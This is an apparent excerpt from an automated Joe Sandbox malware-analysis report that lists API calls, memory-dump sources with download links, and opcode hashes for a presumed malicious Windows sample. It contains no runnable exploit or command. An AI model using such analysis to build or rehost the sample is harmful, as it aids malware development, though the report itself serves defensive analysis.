                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                            • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                            • Opcode ID: cec210b44cd2e1bc5133083961c125c317d25c516828c6abba29919172d5a854
                                                                                                                                                                                                                                                                            • Instruction ID: f607c880652d7ca720cde2a743ce7d70620e2e4e1a05ca0daf5fa44a796dd8f1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cec210b44cd2e1bc5133083961c125c317d25c516828c6abba29919172d5a854
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D4157759053189EDF16EFA4C981BDD77B8AF04341F1000EAA916EB182EB35A7CCDB54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00C838B8
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C838EB
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C83920
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00C83952
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00C8397C
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C8398D
                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C839A7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                            • Opcode ID: e26404e99c318dd0c683ae17262120bbbacab1579183cd726b671cc65354fe1a
                                                                                                                                                                                                                                                                            • Instruction ID: a5262c0995c3dc2089d191d25e063132070980f918b7799095b63475dbcf7cef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e26404e99c318dd0c683ae17262120bbbacab1579183cd726b671cc65354fe1a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09314830704295AFDB21EF48DC84F6937A5FB86B14F152164F5218B2F1CBB1AE44DB09
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C580D0
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C580F6
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C580F9
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C58117
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00C58120
                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00C58145
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C58153
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                            • Opcode ID: b03adf99a2f571d8d031e522451842e6bf7fdcfbd311cc91cbfd2bdbc6f08599
                                                                                                                                                                                                                                                                            • Instruction ID: 3663556a680bcea4052af4d5ab4f1c04a3dd134cf325e05654e9fcbdd6462801
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b03adf99a2f571d8d031e522451842e6bf7fdcfbd311cc91cbfd2bdbc6f08599
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A521A636600219AF9F10DFA8DC88DBF73ACEB493617008425FD15DB2D1DA70DD8A8B68
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C581A9
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C581CF
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C581D2
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32 ref: 00C581F3
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32 ref: 00C581FC
                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00C58216
                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C58224
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                            • Opcode ID: 98be309123e0fbb3cbb491d948ee0d33e458e33720ef72e57a673fb64a7c12a0
                                                                                                                                                                                                                                                                            • Instruction ID: 940803e25157a1a83ab8601fde258cd3adfd08abc8ec2c0dd05ac40141c91196
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98be309123e0fbb3cbb491d948ee0d33e458e33720ef72e57a673fb64a7c12a0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C21B835600504BFDB10DFA8DC88EAE77ECEB09361B108125FD16DB1A0DA70DD89CB68
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00C60E99
                                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C60ED5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                            • Opcode ID: 58f5dae13faa16203a0c54463a0b529e9e77216227787f62e6211f59496e31e0
                                                                                                                                                                                                                                                                            • Instruction ID: ee21487c07575db302eb3bd94fa143de3055d616c1356ffbf541e454544b646c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58f5dae13faa16203a0c54463a0b529e9e77216227787f62e6211f59496e31e0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78217A7050030AABDB308F69D884B9B7BA8AF54320F300A59FCA5E72D1D770AA40DB55
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00C60F6D
                                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C60FA8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                            • Opcode ID: 82281d3769d646383049f41a80e9894f39b2a4adfc4834871f95f9182ff9bc8a
                                                                                                                                                                                                                                                                            • Instruction ID: cef154838b7fa6c44b9db50f70d3cf928e9030dec7457d90bd7af6c5873cdf72
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82281d3769d646383049f41a80e9894f39b2a4adfc4834871f95f9182ff9bc8a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87216B715003459BDB308FA99C85B9A77A8BF55731F380A19FCB2E32E1D7B09A80DB51
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00BF78B1
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7873: GetStockObject.GDI32(00000011), ref: 00BF78C5
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF78CF
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C84BB0
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C84BBD
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C84BC8
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C84BD7
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C84BE3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                            • Opcode ID: b9671e6c243052568f0ab1a718d608385f042936f76366322b9a56892ddfa552
                                                                                                                                                                                                                                                                            • Instruction ID: f69ad7a29a32d32f144ae4fc8f0e1f2bb284ea94fa15fc504ad6e1350bd68dc1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9671e6c243052568f0ab1a718d608385f042936f76366322b9a56892ddfa552
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E1151B255021ABEEB119F65CC85FEB7F9DEF08798F014111BA18A6090CA71DC219BA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C2DB23: _free.LIBCMT ref: 00C2DB4C
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DBAD
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4), ref: 00C22D4E
                                                                                                                                                                                                                                                                              • Part of subcall function 00C22D38: GetLastError.KERNEL32(00CC1DC4,?,00C2DB51,00CC1DC4,00000000,00CC1DC4,00000000,?,00C2DB78,00CC1DC4,00000007,00CC1DC4,?,00C2DF75,00CC1DC4,00CC1DC4), ref: 00C22D60
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DBB8
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DBC3
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DC17
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DC22
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DC2D
                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C2DC38
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                            • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                            • Instruction ID: 239186102a99ed4ced6a838bb9c3fe18a48006c4bea9e388f61cb780ad389260
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88113372581B24BBD520BBB0EC0BFCB77DC9F24701F814C19B2DBAA952DA75B504AB50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C5E328
                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 00C5E32F
                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C5E345
                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 00C5E34C
                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C5E390
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00C5E36D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                            • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                            • Opcode ID: c30cc01669535e96d492f071106b332c8ac9ece7d15685f84757121812a52cde
                                                                                                                                                                                                                                                                            • Instruction ID: d04968c66935c82bf23c58454b72ddc23fce4a3da29fc1d968b3c57b9d710d67
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c30cc01669535e96d492f071106b332c8ac9ece7d15685f84757121812a52cde
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 950112F69002087FE711ABA49D89FEA776CDB08301F4045A1BB46E6091E6749E888B79
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00C61322
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,?), ref: 00C61334
                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,000001F6), ref: 00C61342
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C61350
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C6135F
                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C6136F
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 00C61376
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                            • Opcode ID: 14251fd423c163c6e7c6a9153eadd373ac306696b8787c01e69eb94814a210cb
                                                                                                                                                                                                                                                                            • Instruction ID: cfc6c74ff99fd247139d98a1813b7f64b21bb8df92bfbd1c1576609cb366ea6d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14251fd423c163c6e7c6a9153eadd373ac306696b8787c01e69eb94814a210cb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2FF0C932042612ABD7512B54EE89BDABB39BF04312F441121F103918F097749961DF98
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C7281D
                                                                                                                                                                                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C7283E
                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C7284F
                                                                                                                                                                                                                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00C72938
                                                                                                                                                                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 00C728E9
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5433E: _strlen.LIBCMT ref: 00C54348
                                                                                                                                                                                                                                                                              • Part of subcall function 00C73C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C6F669), ref: 00C73C9D
                                                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 00C72992
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                            • Opcode ID: 607d6b1a17d55a4d4f2a2260b2ee12c591de2320d1bfb20f58f62dca3293be22
                                                                                                                                                                                                                                                                            • Instruction ID: e6622472750a4f20e1d80f4b95af856fc10b33b535d89f7639637b04ec077b4e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 607d6b1a17d55a4d4f2a2260b2ee12c591de2320d1bfb20f58f62dca3293be22
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECB1B435504301AFD324DF24C885F2ABBE5AF84318F54859CF56A4B2E2DB71EE85CB91
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00C2042A
                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C20446
                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00C2045D
                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C2047B
                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00C20492
                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C204B0
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
